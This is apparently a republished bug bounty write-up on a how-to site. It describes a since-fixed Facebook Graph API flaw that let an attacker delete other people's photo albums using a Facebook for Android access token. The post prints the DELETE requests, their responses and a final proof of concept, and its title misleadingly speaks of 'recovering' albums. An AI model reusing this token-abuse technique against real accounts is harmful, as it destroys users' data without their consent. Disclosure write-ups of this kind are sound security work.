Realimagess
No Result
View All Result
  • Login
  • HOW TO
  • WALLPAPERS
  • FIRMWARE
  • ROOTING
  • DRIVER
  • TOOLS
BEST HOSTING
  • HOW TO
  • WALLPAPERS
  • FIRMWARE
  • ROOTING
  • DRIVER
  • TOOLS
No Result
View All Result
Realimagess
No Result
View All Result

How To Recover Any Delete Photo Albums On Facebook

May 4, 2019

RELATED POSTS

How To Set Live Wallpaper for Windows PC using Lively Wallpaper

How to install Mediatek Driver Auto Installer in 5 Seconds

How to Flash Sony Xperia Stock Rom Using FlashTool

What if your photos get deleted without your knowledge?

Obviously, it is very Awkward, isn’t it? Yup this post is regarding a vulnerability found, which allows a malicious user to delete any photo album on Facebook. Any photo album owned by a user or a page or a group could be deleted.

Graph API is the primary way for developers to read and write the users data. All the Facebook apps of now are using Graph API. In general Graph API requires an access token to read or write user data. Read more about Graph API here.

According to Facebook developers documentation, photo albums cannot be deleted using the album node in Graph API.

I tried to delete one of my photo albums using graph explorer access token.

Request :-

DELETE /518171421550249 HTTP/1.1

Host :  graph.facebook.com 

Content-Length: 245

access_token=CAACEd…..MUZD

 Response :-

{“error”:{“message”:”(#200) Application does not have the capability to make this API call.”,”type”:”OAuthException”,”code”:200}}

Why? Because this application doesn’t have the capability to delete photo album. But we need to note the error message. It tells us that some other application does have the capability to make this API call

I decided to try it on Facebook for mobile access token because it is a top-level access token which has some extra permissions. Facebook mobile apps use the same Graph API. so took an album id & Facebook for Android access token of mine and tried it.

Request :-

DELETE /518171421550249 HTTP/1.1

Host :  graph.facebook.com 

Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:-

true

Album(518171421550249) got deleted so what’s the next step? Took the victim’s album id and tried to delete it. I was very curious to see the result.

Request :-

DELETE /518171421550249 HTTP/1.1

Host :  graph.facebook.com 

Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

 Response:-

true

”Oh No”, the album got deleted! So what? I got access to delete all of your Facebook photos (photos which are public or the photos I could see) lol.

I immediately reported this bug to the Facebook security team. They were too fast in identifying this issue and there was a fix in place in less than 2 hours from the acknowledgment of the report.

Read more about getting Facebook for Android access token [Capture Android HTTP/HTTPS Traffic].

Final Proof Of Concept :-

Request :-

DELETE /<Victim’s_photo_album_id> HTTP/1.1

Host :  graph.facebook.com 

Content-Length: 245

access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

if you aren’t sure about how to do it, please see this video [How I Hacked Your Public Facebook Photos]

This vulnerability is completely fixed now.

I thank Facebook Security Team for running the bug bounty program and also for quickly fixing this issue

HALL OF FAME: https://www.facebook.com/whitehat/thanks

Check out this article about Facebook hacking and prevention methods

Leave Comment

ANDROID FIMRWARE

POPULAR POSTS

How To Recover Any Delete Photo Albums On Facebook

How To Recover Any Delete Photo Albums On Facebook

Huawei Y9 2019 JKM-LX1 Firmware

Huawei Y9 2019 JKM-LX1 Firmware Download (Flash File)

Xiaomi Black Shark 2 Pro Firmware

Xiaomi Black Shark 2 Pro Firmware Download (Flash File)

Xiaomi Black Shark 2 Firmware

Xiaomi Black Shark 2 Firmware Download (Flash File)

Load More
Realimagess

One of the best websites that provides Howto Guide, Latest Android Root Methods, USB Driver, Flash Tools, Stock ROM, and Smartphone Wallpapers.


LEARN MORE »

CONTACT INFORMATION

  • ABOUT US
  • CONTACT US
  • PRIVACY AND POLICY

POPULAR TOOLS

Download OST Tool (all versions)

Download Realme Flash Tool (All Versions)

Download Odin Downloader (all versions)

CONNECT WITH US

Hosted on Namecheap Copyright © 2019 Realimagess All Rights Reserved.

No Result
View All Result
  • HOW TO
  • WALLPAPERS
  • FIRMWARE
  • ROOTING
  • DRIVER
  • TOOLS

Hosted on Namecheap Copyright © 2019 Realimagess All Rights Reserved.

Welcome Back!

Login to your account below

Forgotten Password?

Create New Account!

Fill the forms below to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.